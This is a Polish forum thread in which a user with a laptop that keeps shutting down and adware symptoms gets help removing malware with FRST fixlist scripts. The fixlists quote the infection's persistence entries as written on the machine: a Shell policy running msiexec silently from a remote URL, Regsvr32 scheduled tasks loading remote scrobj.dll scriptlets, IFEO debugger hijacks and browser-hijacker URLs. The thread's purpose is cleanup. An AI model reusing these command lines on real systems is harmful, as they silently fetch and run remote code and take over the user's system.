Problem z ciągłym wyłączaniem się komputera


(Robass) #1

Witam serdecznie.
Mam takowy problem jak w temacie,laptop wyłącza się bez żadnej przyczyny i potrafi tak zrobić kilka razy dziennie.
Nie wiem,w Jaki sposób zainstalował mi się YAC na laptopie.
Poczytałem troszkę o YAC’ku i nie jest to bezpieczna aplikacja z tego co wyczytałem na stronach internetowych.
Usunąłem go,ale problem jest nadal i nie wiem co się dzieje.
Dodam że z wydechu laptopa nieraz zieje ogniem,jak by nie wiem ile aplikacji pracowało na nim.
Proszę o pomoc i z góry dziękuję.
Logi z FRST w linkach.

http://wklej.org/id/3114775/
http://wklej.org/id/3114771/


(Longhorn2009) #2

Podejrzewam, że laptop ci się przegrzewa i stąd pojawia się cut off. Intelowskie procesory Core 1 gen miały z tym duże problemy, nie znam żadnego lapka tej generacji który do dzisiaj przetrwałby przynajmniej bez solidnej konserwacji układu chłodzenia.


(Robass) #3

Cóż widzę ze nie otrzymam odpowiedzi czy logi czyste czy nie.


(Atis) #4

A może wklej cały log Addition.txt.


(Robass) #5

Nawet nie zwróciłem uwagi ze nie ma całego.
Więc wklejam jeszcze raz dwa.

http://wklej.org/id/3115872/
http://wklej.org/id/3115874/


(Atis) #6

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

CloseProcesses: HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2297107216-2948167871-251712987-1001\...\Run: [World of Tanks] => C:\Games\World_of_Tanks\WargamingGameUpdater.exe [3135752 2017-02-28] (Wargaming.net) HKU\S-1-5-21-2297107216-2948167871-251712987-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8cFkU5FkQLOWH1MjF5MWY8OTH8MYYxNWE3OTk3RTzLNH== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] FF Extension: (SimilarWeb) - C:\Users\PIRAT\AppData\Roaming\Firefox\Firefox\Profiles\nlfresnl.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-04-28] [Brak podpisu cyfrowego] FF Extension: (HSearch) - C:\Users\PIRAT\AppData\Roaming\Firefox\Firefox\Profiles\nlfresnl.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi [2017-04-20] [Brak podpisu cyfrowego] FF Extension: (FF Adr) - C:\Users\PIRAT\AppData\Roaming\Firefox\Firefox\Profiles\nlfresnl.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-04-20] [Brak podpisu cyfrowego] FF SearchPlugin: C:\Users\PIRAT\AppData\Roaming\Firefox\Firefox\Profiles\nlfresnl.default\searchplugins\startsearch.xml [2017-05-16] FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\PIRAT\AppData\Roaming\Mozilla\Firefox\Profiles\nlfresnl.default\extensions\arthurj8283@gmail.com CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1494508473&from=c8350511&uid=hgstxhts545050a7e680_rb25waas0neu9j0neu9jx&z=2342819ecaadff39e0a0a28gdz6t1zcw1e1b3z5q4t CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1494508473&from=c8350511&uid=hgstxhts545050a7e680_rb25waas0neu9j0neu9jx&z=2342819ecaadff39e0a0a28gdz6t1zcw1e1b3z5q4t" CHR DefaultSearchURL: Default -> hxxp://www.luckysearch123.com/search.php?type=ds&ts=1494508473&from=c8350511&uid=hgstxhts545050a7e680_rb25waas0neu9j0neu9jx&z=2342819ecaadff39e0a0a28gdz6t1zcw1e1b3z5q4t&q={searchTerms} CHR DefaultSearchKeyword: Default -> luck HKU\S-1-5-21-2297107216-2948167871-251712987-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) <==== UWAGA R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101016 2017-05-14] () <==== UWAGA R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited) R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\Office\PackageLocker.dll [119808 2017-04-20] () [Brak podpisu cyfrowego] <==== UWAGA S3 4585FB8834237458; \??\C:\Users\PIRAT\AppData\Local\Temp\17BDF5F6-E9F8CD04-BEA29868-14B2D412\cfeaa006a8.sys [X] <==== UWAGA S3 4585FF7341069F72; \??\C:\Users\PIRAT\AppData\Local\Temp\288BE6A4-BD1F0A94-7C05201C-A25FFFC4\114e25e1.sys [X] <==== UWAGA 2017-05-16 07:49 - 2017-05-16 07:49 - 00000000 ____D C:\Program Files (x86)\Firefox 2017-05-16 07:45 - 2017-05-16 07:45 - 00000000 ____D C:\Program Files (x86)\591A91EC_jumpeasy 2017-05-16 07:45 - 2017-05-16 07:45 - 00000000 _____ C:\WINDOWS\SysWOW64\22 2017-05-12 22:20 - 2017-05-12 22:31 - 00000000 ____D C:\AdwCleaner 2017-05-11 15:10 - 2017-05-11 15:10 - 00000000 ____D C:\WINDOWS\system32\log 2017-04-20 18:19 - 2017-04-20 18:19 - 00000000 ____D C:\Users\PIRAT\AppData\Roaming\Firefox 2017-04-20 18:19 - 2017-04-20 18:19 - 00000000 ____D C:\Users\PIRAT\AppData\Local\Firefox 2017-04-20 18:18 - 2017-04-20 18:18 - 00000000 ____D C:\Users\PIRAT\AppData\Local\Everbean 2017-04-20 18:17 - 2017-04-20 18:17 - 00000000 ____D C:\Program Files (x86)\Everbean 2017-04-20 18:09 - 2017-05-16 10:00 - 00000000 _____ C:\Users\Public\Documents\report.dat 2017-04-20 18:09 - 2017-05-16 07:48 - 00000000 _____ C:\Users\Public\Documents\temp.dat 2017-04-20 18:04 - 2017-05-16 07:45 - 00000000 ____D C:\Program Files (x86)\BiaoJi 2016-11-17 17:08 - 2016-11-17 17:08 - 26320776 _____ () C:\Users\PIRAT\AppData\Roaming\gameboxsetup.exe HKU\S-1-5-21-2297107216-2948167871-251712987-1001\...\ChromeHTML: -> C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) <==== UWAGA Task: {48B2069A-6DDC-4782-867B-3FF45DB2B64E} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8cFkU5FkQLOWH1MjF5MWY8OTH8MYYxNWE3OTk3RTzLNH== scrobj.dll Task: {5C6AF6BE-B973-43F3-9AA5-EA73F4D3EFAB} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8cFkU5FkQLOWH1MjF5MWY8OTH8MYYxNWE3OTk3RTzLNH== scrobj.dll Shortcut: C:\Users\PIRAT\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\PIRAT\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Everbean\Application\chrome.exe (Google Inc.) C:\ProgramData\Microsoft\Office\PackageLocker.dll C:\Program Files (x86)\ScreenShot MSCONFIG\Services: iSafeService => 2 EmptyTemp:
Uruchom FRST i kliknij Napraw (Fix). Pokaż raport z usuwania Fixlog.
Kliknij Skanuj (Scan) i pokaż nowy raport z FRST bez Addition i Shortcut.


(Robass) #7

Log z usuwania.
http://wklej.org/id/3115943/
Log z ponownego skanowania.
http://wklej.org/id/3115949/

Dodam że w trakcie usuwania FRST złapał trzy razy brak odpowiedzi.


(Atis) #8

Wklej do systemowego notatnika i zapisz jako plik tekstowy o nazwie fixlist:

FF Homepage: Mozilla\Firefox\Profiles\nlfresnl.default -> hxxp://www.luckysearch123.com?type=hp&ts=1494508473&from=c8350511&uid=hgstxhts545050a7e680_rb25waas0neu9j0neu9jx&z=2342819ecaadff39e0a0a28gdz6t1zcw1e1b3z5q4t FF NewTab: Mozilla\Firefox\Profiles\nlfresnl.default -> hxxp://www.luckysearch123.com?type=hp&ts=1494508473&from=c8350511&uid=hgstxhts545050a7e680_rb25waas0neu9j0neu9jx&z=2342819ecaadff39e0a0a28gdz6t1zcw1e1b3z5q4t FF Extension: (xRocket Toolbar) - C:\Users\PIRAT\AppData\Roaming\Mozilla\Firefox\Profiles\nlfresnl.default\Extensions\arthurj8283@gmail.com [2017-05-11] [Brak podpisu cyfrowego] FF SearchPlugin: C:\Users\PIRAT\AppData\Roaming\Mozilla\Firefox\Profiles\nlfresnl.default\searchplugins\luck.xml [2017-05-11] 2017-05-08 14:44 - 2017-05-08 14:44 - 00000000 ____D C:\Users\Public\Documents\chrome DeleteQuarantine:
Uruchom FRST i kliknij Napraw (Fix). Później skasuj folder C:\FRST
Czyszczenie folderów Przywracania systemu
Przeczytaj w jaki sposób należy instalować programy: KLIK - KLIK - KLIK


(Robass) #9

Poprzedni fixlist usunąć??